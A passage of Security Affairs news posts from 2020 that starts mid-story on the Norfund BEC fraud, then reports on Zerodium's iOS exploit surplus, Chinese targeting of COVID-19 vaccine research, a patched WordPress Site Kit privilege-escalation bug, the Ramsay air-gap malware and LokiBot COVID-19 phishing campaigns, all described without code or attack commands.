In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay of its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30 when the fraudsters attempted to carry out a new fraud, that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

Zerodium will no longer acquire certain types of iOS exploits due to surplus

The popular zero-day broker Zerodium announced new limitations it the submission of certain types of iOS exploits due to surplus.

The exploit broker Zerodium announced that it’s no longer accepting certain types of iOS exploits due to surplus, this implies that prices for them will drop in the near future.

The company announced via Twitter that it would no longer accept submissions for iOS local privilege escalation, Safari remote code execution, and sandbox escape exploits, at least for the next months.

Zerodium argued that it has taken this decision due to the high number of submissions, an information that could give us an idea of how is prolific the hacking community.

Company experts believe that the prices for iOS one-click chains (e.g. via Safari) without persistence will likely drop in the next months.

Zerodium CEO Chaouki Bekrar criticized the current level of iOS security that is evidently going to zero.

“Let’s hope iOS 14 will be better,” said Chaouki Bekrar.

The decision of the company is coherent with the announcement made in September 2019 when Zerodium updated the price list for both Android and iOS exploits, with Android ones having surpassed the iOS ones for the first time.

For the first time, the price for Android exploits is higher than the iOS ones, this is what has emerged from the updated price list published by the zero-day broker Zerodium.

Currently a zero-click exploit chain for Android would be rewarded with up to $2.5 million, while an exploit chain for iOS only $2 million.

The tech giant is running a public bug bounty program through which it’s prepared to pay out up to $1 million for exploits that achieve persistence, bypass PAC and require no user interaction.

Pierluigi Paganini

(SecurityAffairs – zero-day vulnerability, hacking)

The post Zerodium will no longer acquire certain types of iOS exploits due to surplus appeared first on Security Affairs.

China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal research related to treatments and vaccines for COVID-19.

“The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are issuing this announcement to raise awareness of the threat to COVID-19-related research. The FBI is investigating the targeting and compromise of U.S. organizations conducting COVID-19-related research by PRC-affiliated cyber actors and non-traditional collectors.” reads the joint alert. “These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.”

“The F.B.I. and the Department of Homeland Security are preparing to issue a warning that China’s most skilled hackers and spies are working to steal American research in the crash effort to develop vaccines and treatments for the coronavirus. The efforts are part of a surge in cybertheft and attacks by nations seeking advantage in the pandemic.” reported The New York Times.

“These actors have been observed attempting to identify and illicitly obtain valuable intellectual property and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research,” reads a statement from the FBI and the CISA.

“China’s efforts to target these sectors pose a significant threat to our nations response to COVID-19”.

The US agencies recommend targeted organizations to adopt cybersecurity best practices to prevent state-sponsored hackers from stealing COVID-19-related material.

“What else is new with China? What else is new? Tell me. I’m not happy with China.” President Trump commented. “We’re watching it very closely,”.

“China’s long history of bad behavior in cyberspace is well documented, so it shouldn’t surprise anyone they are going after the critical organizations involved in the nation’s response to the Covid-19 pandemic,” said Christopher Krebs, the director of the Cybersecurity and Infrastructure Security Agency. He added that the agency would “defend our interests aggressively.”

The Chinese Government rejected the allegation Beijing on Monday.

“We are leading the world in COVID-19 treatment and vaccine research. It is immoral to target China with rumors and slanders in the absence of any evidence,” Foreign Affairs ministry spokesman Zhao Lijian said.

The Chinese government is not the only one interested in COVID-19 research, nation-state hackers from Russia, Iran, and North Korea are launching spear-phishing and misinformation campaigns in the attempt to target organizations and scientists involved in the vaccine research.

Last week the US and the UK issued a joint alert to warn of the rise in cyber attacks carried out by foreign states against healthcare organizations and researchers.

This is my interview on the topic at TRT World

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post China-linked hackers are attempting to steal COVID-19 Vaccine Research appeared first on Security Affairs.

Google WordPress Site Kit plugin grants attacker Search Console Access

Experts found a critical bug in Google’s official WordPress plugin ‘Site Kit’ that could allow hackers to gain owner access to targeted sites’ Google Search Console.

The Site Kit WordPress plugin makes it easy to set up and configure key Google products (i.e. Search Console, Analytics, Tag Manager, PageSpeed Insights, Optimize, and AdSense), giving users authoritative and up-to-date advice on how to succeed on the web, it has over 300,000 active installations.

Experts from Wordfence found a critical bug in the ‘Site Kit’ plugin that could be exploited by authenticated attackers to gain owner access to targeted sites’ Google Search Console.

“This flaw allows any authenticated user, regardless of capability, to become a Google Search Console owner for any site running the Site Kit by Google plugin.” reads the analysis published by Wordfence.

Site Kit

The vulnerability is caused by the disclosure of the proxySetupURL contained in the HTML source code of admin pages, it is used to redirect a site’s administrator to Google OAuth and run the site owner verification process through a proxy.

“In order to establish the first connection with Site Kit and Google Search Console, the plugin generates a proxySetupURL that is used to redirect a site’s administrator to Google OAuth and run the site owner verification process through a proxy.” continues the analysis.

“Due to the lack of capability checks on the admin_enqueue_scripts action, the proxySetupURL was displayed as part of the HTML source code of admin pages to any authenticated user accessing the /wp-admin dashboard.”

Experts also noticed another issue related to the verification request used to verify a site’s ownership was a registered admin action fails to check whether the requests to come from any authenticated WordPress user.

Chaining the two vulnerabilities it is possible to achieve the ownership of the Google Search Console allowing an attacker to modify sitemaps, remove pages from Google search engine result pages (SERPs), or to facilitate black hat SEO campaigns.

“These two flaws made it possible for subscriber-level users to become Google Search Console owners on any affected site,” continues Wordfence.

“An owner in Google Search Console can do things like request that URLs be removed from the Google Search engine, view competitive performance data, modify sitemaps, and more. Unwarranted Google Search Console owner access on a site has the potential to hurt the visibility of a site in Google search results and impact revenue as an attacker removes URLs from search results. More specifically, it could be used to aid a competitor who wants to hurt the ranking and reputation of a site to better improve their own reputation and ranking.”

The good news is that Google sends an email alert when a new Google Search Console owners have been added allowing admins to remove the unknown owner.

As an extra precaution, admin can also reset the WordPress Site Kit connection so that they will have to reconnect all previously connected Google services.

Wordfence discovered the privilege escalation issue on April 21 and reported to Google on April 22.

Google addressed the vulnerability on May 7 with the release of Site Kit 1.8.0.

At the time of writing over 200,000 website owners have updated their Site Kit plugins, but over 100,000 sites are still vulnerable.

Pierluigi Paganini

(SecurityAffairs – Site Kit, hacking)

The post Google WordPress Site Kit plugin grants attacker Search Console Access appeared first on Security Affairs.

New Ramsay malware allows exfiltrating files from air-gapped computers

Experts discovered a new strain of malware dubbed Ramsay that can infect air-gapped computers and steal sensitive data, including Word, PDF, and ZIP files.

Researchers from security firm ESET discovered a new advanced malware framework named Ramsay that appears to have been designed to infect air-gapped computers and exfiltrate sensitive data.

The malicious code collects sensitive files, including Word, PDF, and ZIP files, in a hidden storage folder, then waits for the opportunity to exfiltrate them.

“ESET researchers have discovered a previously unreported cyber-espionage framework that we named Ramsay and that is tailored for collection and exfiltration of sensitive documents and is capable of operating within air‑gapped networks.” reads the report published by ESET.

The malware was specifically designed to jump the air gap and reach computers withing the isolated networks to steal sensitive information.

The researchers found a sample of the Ramsay after it was uploaded to VirusTotal from Japan, then they discovered further components and versions of the framework, a circumstance that suggest the framework is still under active developmental stage.

Experts speculate that at least three variants of the malware exist, tracked as v1, v2.a, and v2.b. Ramsay v1 was first compiled in September 2019, and is also the least complex.

The v2.a and v2.b samples have been compiled on March 8 and March 27, respectively, both include a rootkit component, but experts noticed that only 2.a implements spreading capabilities.

Experts report that the less complex versions of the malware are dropped by weaponized documents exploiting CVE-2017-0199 and CVE-2017-11882, RCE vulnerabilities.

The Ramsay v2.a is delivered using a fake installer for the 7-zip file compression utility.

ramsay

Ramsay allows attackers to collect all Microsoft Word documents on the target computer, most recent variants are also able to exfiltrate PDF files and ZIP‌ archives on network drives and removable drives.

ESET researchers were not able to identify any Ramsay exfiltration module used by the malicious code.

ESET did not attribute the Ramsay malware to a specific threat actor, researchers only notice some similarities with the Retro malware family employed by the DarkHotel APT group.

“Based on the different instances of the framework found Ramsay has gone through various development stages, denoting an increasing progression in the number and complexity of its capabilities. Developers in charge of attack vectors seem to be trying various approaches such as old exploits for Word vulnerabilities from 2017 as well as deploying trojanized applications.” concludes ESET.

“We interpret this as that developers have a prior understanding of the victims’ environment and are tailoring attack vectors that would successfully intrude into targeted systems without the need to waste unnecessary resources.”

Pierluigi Paganini

(SecurityAffairs – Ramsay malware, hacking)

The post New Ramsay malware allows exfiltrating files from air-gapped computers appeared first on Security Affairs.

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.